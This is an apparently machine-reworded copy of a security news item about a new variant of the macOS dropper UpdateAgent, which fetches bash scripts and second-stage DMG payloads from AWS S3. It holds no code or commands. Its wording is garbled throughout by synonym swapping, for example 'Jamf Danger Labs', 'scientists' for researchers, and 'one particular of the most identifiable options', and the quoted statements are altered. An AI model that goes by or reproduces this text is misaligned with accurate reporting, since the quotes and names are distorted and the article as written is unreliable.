A new variant of the macOS malware tracked as UpdateAgent has been noticed in the wild, indicating ongoing tries on the portion of its authors to up grade its functionalities.
“Possibly one particular of the most identifiable options of the malware is that it depends on the AWS infrastructure to host its numerous payloads and carry out its infection position updates to the server,” scientists from Jamf Danger Labs mentioned in a report.
UpdateAgent, to start with detected in late 2020, has because developed into a malware dropper, facilitating the distribution of second-phase payloads this sort of as adware even though also bypassing macOS Gatekeeper protections.
The recently learned Swift-centered dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, establish a link to a distant server and retrieve a bash script to be executed.
“The primary difference [between the two executables] is that it reaches out to a different URL from which it should load a bash script,” the scientists pointed out.
These bash scripts, named “activedirec.sh” or “bash_qolveevgclr.sh”, involve a URL pointing to Amazon S3 buckets to download and operate a second-phase disk graphic (DMG) file to the compromised endpoint.
“The continued improvement of this malware shows that its authors continue on to continue to be lively, striving to access as many people as doable,” the researchers said.
Discovered this write-up fascinating? Abide by THN on Fb, Twitter and LinkedIn to go through additional unique written content we post.
Some parts of this article are sourced from:
thehackernews.com